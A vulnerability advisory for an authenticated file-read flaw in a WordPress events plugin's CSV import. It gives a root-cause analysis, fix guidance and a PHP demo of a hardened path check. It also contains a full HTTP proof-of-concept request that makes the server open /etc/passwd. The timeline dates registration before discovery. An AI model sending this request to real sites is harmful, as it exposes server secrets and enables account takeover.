CVE-2026-3585 affects The Events Calendar and its Event Aggregator import workflow. It is an authenticated Local File Inclusion issue in the CSV import path: a low-privilege user who can manage event imports (Author or above) can point the importer at an arbitrary local path and force the server to open it as if it were a CSV file. Although this is not code execution, the impact is serious because it turns an editorial role into a tool for reading sensitive server files that were never meant to be exposed through the application. Given the plugin's install base of 700,000+ sites, this is especially relevant on multi-author sites and in organizations where event staff hold elevated content permissions but should never have access to server-level secrets.
| Field | Value |
| --- | --- |
| CVE | CVE-2026-3585 |
| Plugin Version | The Events Calendar <= 6.15.17 |
| All time (downloads) | 80 233 333 |
| Active installations | 700 000+ |
| Publicly Published | March 9, 2026 |
| Last Updated | March 9, 2026 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3585 ; https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar/the-events-calendar-61517-authenticated-author-arbitrary-file-read-via-ajax-create-import ; https://t.me/cleantalk_researches/382 |
Timeline
| Date | Event |
| --- | --- |
| March 3, 2026 | Plugin testing and vulnerability detection in The Events Calendar have been completed |
| March 3, 2026 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 8, 2026 | Registered CVE-2026-3585 |
Discovery of the Vulnerability
The vulnerable behavior sits in the Event Aggregator AJAX import flow. A user-controlled value in aggregator[csv][file] is accepted by the import creation handler and persisted into the import record metadata as a file path, without any allow list of safe directories being enforced. The server then resolves the path with realpath and opens it through the CSV reader using SplFileObject. The critical mistake is that realpath only canonicalizes the path (collapsing ../ segments and symlinks); it does not check that the resulting file lives under an approved directory such as uploads or a dedicated import folder. As a result, a path like /etc/passwd, or any other file readable by the web server user, is accepted as the source file for import processing. This is a textbook path-based authorization failure in file-handling code: the path is validated for existence, not for policy.
Understanding LFI attacks
Local File Inclusion issues in WordPress plugins are often high severity because WordPress deployments keep sensitive data in predictable locations. A classic target is wp-config.php, which exposes database credentials and authentication salts, and on many hosts additional secrets live in environment files, debug logs, or deployment artifacts. Even system files like /etc/passwd are valuable because they reveal usernames and service accounts that help an attacker tailor later exploitation. In shared hosting and container deployments, the directory structure often contains neighboring app configs, backups, or mounted secrets. When a plugin lets an authenticated user open arbitrary readable paths, it becomes a stepping stone from a simple Author account to full compromise through credential theft. This is why LFI is not merely information disclosure: it frequently becomes a pivot into database access and account takeover.
Exploiting the LFI Vulnerability
To exploit CVE-2026-3585, an attacker with Author+ cookies first visits the Event Aggregator page (http://138.124.55.33/wp-admin/edit.php?post_type=tribe_events&page=aggregator on the test instance) and extracts the "tribe_aggregator_nonce" value from the page source. The nonce is then used in a create-import request whose CSV file parameter points at a local path of the attacker's choosing.

PoC:

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 138.124.55.33
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://138.124.55.33/wp-admin/edit.php?post_type=tribe_events&page=aggregator
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 194
Origin: http://138.124.55.33
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: AUTHOR+

action=tribe_aggregator_create_import&tribe_aggregator_nonce=431f15e9b5&aggregator[origin]=csv&aggregator[csv][content_type]=tribe_events&aggregator[csv][file]=/etc/passwd&aggregator[action]=new
```

The Cookie value AUTHOR+ stands for the session cookies of any Author-level (or higher) account; the nonce is per-session and must be taken from the page the attacker loaded.
The most damaging outcome is disclosure of configuration and secret material that enables follow-on compromise. An attacker who can read the WordPress config or environment secrets can pivot to database extraction, credential reuse, and long-term persistence. On sites where staging and production share a host, directory enumeration and file reads can expose deployment pipelines, API keys, and backups. For organizations that run events at scale, a compromised Author account is realistic through phishing or credential reuse, and this bug converts that foothold into server-level intelligence. The risk is amplified because the import feature is often enabled for operational convenience, and admins may grant event editors broader permissions than they realize. This makes the vulnerability a practical target for quiet credential theft rather than noisy defacement.
Recommendations for Improved Security
The correct fix is a strict path policy. The importer must enforce that the CSV file path resides inside an approved directory, typically uploads or a dedicated aggregator import directory: call realpath on both the candidate path and the base directory, then require the resolved candidate to start with the resolved base plus a trailing directory separator (without the separator, a sibling such as uploads_evil would pass a naive prefix check). Any path outside the allowed base must be rejected before the import record is created, not after. Better still, do not accept filesystem paths from the request at all: require uploads through WordPress media handling and store only attachment IDs, resolving the path server-side from the attachment. On the authorization side, access to the aggregator import endpoints should be restricted to trusted roles, and nonces should be validated as request-integrity (CSRF) controls but never treated as authorization. As an operational mitigation, site owners should review which roles can reach Event Aggregator, disable CSV import if it is not needed, update to a fixed release, and rotate secrets if there is any suspicion of exposure, especially database credentials and API keys.
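The following PHP is an added example, not code from The Events Calendar or from the plugin's fix. It places the unsafe pattern described in the discovery section (realpath, then SplFileObject, with no base-directory check) beside the hardened check recommended above, and exercises both against a constructed directory layout in the temp dir. The function names, the base directory and the sample paths are assumptions for illustration; the interesting cases are a ../ traversal out of the base, a sibling directory whose name shares the base as a prefix, and the advisory's own /etc/passwd target.

```php
<?php
// Added example (not the plugin's code). Demonstrates why realpath() alone is
// not a path policy, and how a base-directory prefix check closes the gap.

// Unsafe pattern: realpath() canonicalises the path but accepts any readable file.
function open_csv_unsafe(string $userPath): ?SplFileObject
{
    $resolved = realpath($userPath);
    if ($resolved === false || !is_file($resolved)) {
        return null;
    }
    return new SplFileObject($resolved, 'r'); // /etc/passwd is opened here
}

// Hardened: resolve both sides, then require the candidate to sit below the base.
function resolve_import_path(string $userPath, string $baseDir): ?string
{
    $base     = realpath($baseDir);
    $resolved = realpath($userPath);
    if ($base === false || $resolved === false || !is_file($resolved)) {
        return null;
    }
    // Trailing separator matters: "/srv/uploads_evil/x.csv" must not match "/srv/uploads".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $resolved;
}

function open_csv_safe(string $userPath, string $baseDir): ?SplFileObject
{
    $resolved = resolve_import_path($userPath, $baseDir);
    if ($resolved === null) {
        return null;
    }
    $f = new SplFileObject($resolved, 'r');
    $f->setFlags(SplFileObject::READ_CSV | SplFileObject::SKIP_EMPTY
               | SplFileObject::READ_AHEAD | SplFileObject::DROP_NEW_LINE);
    return $f;
}

// Constructed layout: an allowed uploads dir, a look-alike sibling, and a secret.
$root = sys_get_temp_dir() . '/ea_demo_' . getmypid();
mkdir("$root/uploads", 0700, true);
mkdir("$root/uploads_evil", 0700, true);
file_put_contents("$root/uploads/events.csv", "title,start\nMeetup,2026-03-09\n");
file_put_contents("$root/uploads_evil/x.csv", "title,start\nEvil,2026-03-09\n");
file_put_contents("$root/secret.txt", "db_password=example-only\n");

$cases = [
    "$root/uploads/events.csv"    => true,  // legitimate import file
    "$root/uploads/../secret.txt" => false, // traversal out of the base
    "$root/uploads_evil/x.csv"    => false, // sibling dir sharing the prefix
    '/etc/passwd'                 => false, // the advisory's PoC target
];

$failures = 0;
foreach ($cases as $path => $expected) {
    $unsafeOpens = open_csv_unsafe($path) !== null;
    $safeOpens   = open_csv_safe($path, "$root/uploads") !== null;
    printf("%-45s unsafe=%-5s safe=%-5s\n", $path,
        var_export($unsafeOpens, true), var_export($safeOpens, true));
    if ($safeOpens !== $expected) {
        $failures++;
    }
}

// Tidy up the constructed layout.
foreach (["$root/uploads/events.csv", "$root/uploads_evil/x.csv", "$root/secret.txt"] as $f) {
    unlink($f);
}
rmdir("$root/uploads");
rmdir("$root/uploads_evil");
rmdir($root);

exit($failures === 0 ? 0 : 1);
```

On a typical Linux host the unsafe function opens every one of the four paths (it only asks "does this file exist?"), while the hardened function opens only uploads/events.csv. Note that the check is done on the realpath output, so a symlink planted inside uploads that points outside it is also rejected; that is the reason both the candidate and the base are resolved before the comparison rather than comparing the raw strings.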
By taking proactive measures against LFI flaws like CVE-2026-3585, WordPress site owners can strengthen their security posture and reduce the chance of exploitation. Stay vigilant, stay secure.
Dmitrii I.
